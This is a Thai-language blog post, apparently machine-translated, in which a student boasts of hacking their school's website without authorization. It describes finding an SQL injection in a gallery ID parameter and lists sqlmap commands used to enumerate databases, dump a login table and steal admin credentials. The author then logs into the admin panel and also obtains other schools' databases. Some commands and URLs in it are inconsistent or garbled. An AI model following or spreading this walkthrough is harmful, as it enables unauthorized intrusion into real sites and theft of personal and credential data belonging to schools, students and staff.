อย่าเรียนรู้ที่จะแฮ็ก แฮ็กเพื่อเรียนรู้

มาดูกันว่าฉันแฮ็กเว็บไซต์โรงเรียนของฉันในฐานะนักเรียนระดับกลางได้อย่างไร

เป็นช่วงล็อคดาวน์ที่ผมเข้าสู่วงการแฮ็กและเรียนรู้หลายสิ่งหลายอย่าง (โดยการอ่านหนังสือ) แต่ไม่มีความรู้เชิงปฏิบัติ

ผมจะอัพโหลดบทความเกี่ยวกับวิธีการแฮกเว็บไซต์ อย่าลืมติดตามนะครับ จะได้ไม่พลาด

#เวลาดำเนินการ#

ฉันอ่านคำพูดที่ว่า “อย่าเรียนรู้ที่จะแฮ็ก แฮ็กเพื่อเรียนรู้” และสิ่งนี้ใช้ได้กับฉัน ฉันเริ่มแฮ็กหลังจากนี้และพบข้อผิดพลาดมากมายที่รายงานไว้ แต่ #นอกขอบเขต #

ฉันมักจะแฮ็คโปรแกรมสาธารณะ หลังจากดำเนินการอย่างช้าๆ ฉันพบว่าเพื่อทดสอบความรู้เชิงปฏิบัติของฉัน ฉันต้องเจาะเว็บไซต์บางเว็บไซต์ที่ไม่เป็นที่รู้จัก มันเป็นการอำลา 'รูปของเราถูกอัพโหลดบนเว็บไซต์โรงเรียนของเรา' ดังนั้นฉันจึงไปที่นั่นเพื่อดูรูปของฉัน แต่รูปของฉัน (คุณรู้ดี ) ข้ามเรื่องนี้ไปเถอะ

#พบข้อผิดพลาด#

เมื่อฉันเจอรูปภาพของฉัน ฉันสังเกตเห็นว่า URL นั้นเป็น 'https://my-school.co.in/galary.aspx?Id=343'

กว่าฉันจะใส่เพย์โหลด xss แต่ไฟร์วอลล์หยุดไม่ให้ดำเนินการ หลังจากนั้นไม่นานฉันก็รู้ว่าพารามิเตอร์ส่วนใหญ่ฉันมีความเสี่ยงต่อการฉีด SQL และ boom เมื่อฉันใส่ ' มันแสดง SQL error ใช่ มันเป็นข้อผิดพลาดตาม SQL injection

#FOUND 1,000+ ฐานข้อมูลของเมืองของฉัน#

ฉันใส่เว็บไซต์โรงเรียนของฉันในเครื่องมือ sqlmap ซึ่งเป็นเครื่องมือที่ใช้สำหรับช่องโหว่ของ sql injection ฉันใช้คำสั่งด้านล่างเพื่อแยกฐานข้อมูล

sqlmap -u https://my-schoool?id=356 --dbs

# แยกรหัสผ่านของผู้ดูแลระบบ #

หลังจากนี้ฉันใส่ URL ใน sqlmap กว่าจะพบว่ามีฐานข้อมูลทุกโรงเรียนอยู่ที่นั่น ดังนั้นฉันจึงไปที่ฐานข้อมูลโรงเรียนของฉันโดยแยกคอลัมน์กว่าตารางที่ชื่อว่า "การเข้าสู่ระบบ" ที่นั่น ฉันได้รับข้อมูลประจำตัวของผู้ดูแลระบบ ดังนั้นฉันจึงเข้าสู่ระบบในฐานะผู้ดูแลระบบ และฉันก็เข้าสู่แผงผู้ดูแลระบบของเว็บไซต์โรงเรียน

คำสั่ง

'D' หมายถึงฐานข้อมูล 1:

sqlmap -u https://my-school?id=465 --column -D my-school-database

sqlmap -u https://my-school?id=465 --tables -C some-column

sqlmap -u https://my-school?id=465 -T logon --dump

ฉันยังได้ฐานข้อมูลโรงเรียนในเมืองของเราด้วย ฮ่า.

หวังว่าคุณจะสนุกกับมัน

มีความสุขในการแฮ็ค